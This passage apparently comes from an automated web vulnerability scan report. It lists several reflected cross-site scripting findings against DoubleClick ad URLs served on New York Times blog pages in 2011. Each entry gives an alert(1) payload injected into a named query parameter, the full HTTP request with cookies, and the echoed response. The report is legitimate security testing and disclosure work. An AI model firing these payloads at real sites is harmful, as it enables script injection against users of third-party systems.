Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
x_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cbd22bd"-alert(1)-"1f5f893988d&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
...[SNIP]...

4.24. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7093"-alert(1)-"1e87edde91c was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30ccd7093"-alert(1)-"1e87edde91c&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
6%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30ccd7093"-alert(1)-"1e87edde91c&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.25. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4194f'-alert(1)-'19a55e40fc5 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc4194f'-alert(1)-'19a55e40fc5&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
6%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc4194f'-alert(1)-'19a55e40fc5&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.26. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31578'-alert(1)-'30af61f0de1 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick31578'-alert(1)-'30af61f0de1&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick31578'-alert(1)-'30af61f0de1&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.27. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c6b6"-alert(1)-"a19ae64d3de was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick5c6b6"-alert(1)-"a19ae64d3de&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick5c6b6"-alert(1)-"a19ae64d3de&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "ne
...[SNIP]...

4.28. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351e4"-alert(1)-"2b62cf2cc42 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279351e4"-alert(1)-"2b62cf2cc42&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279351e4"-alert(1)-"2b62cf2cc42&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.29. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa31c'-alert(1)-'7df3705589b was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279aa31c'-alert(1)-'7df3705589b&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279aa31c'-alert(1)-'7df3705589b&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.30. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6f64'-alert(1)-'07e837f5fb5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotod6f64'-alert(1)-'07e837f5fb5&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
v8/3b05/7/10c/%2a/n%3B239192403%3B0-0%3B0%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotod6f64'-alert(1)-'07e837f5fb5&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.
...[SNIP]...

4.31. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6b3"-alert(1)-"32d83a54c1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto1f6b3"-alert(1)-"32d83a54c1&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6457

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
v8/3b05/7/10b/%2a/n%3B239192403%3B0-0%3B0%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto1f6b3"-alert(1)-"32d83a54c1&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.
...[SNIP]...

4.32. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760ef'-alert(1)-'f6235b48eb5 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250760ef'-alert(1)-'f6235b48eb5&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250760ef'-alert(1)-'f6235b48eb5&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.33. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9fe6"-alert(1)-"fa3faa6ea46 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250a9fe6"-alert(1)-"fa3faa6ea46&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
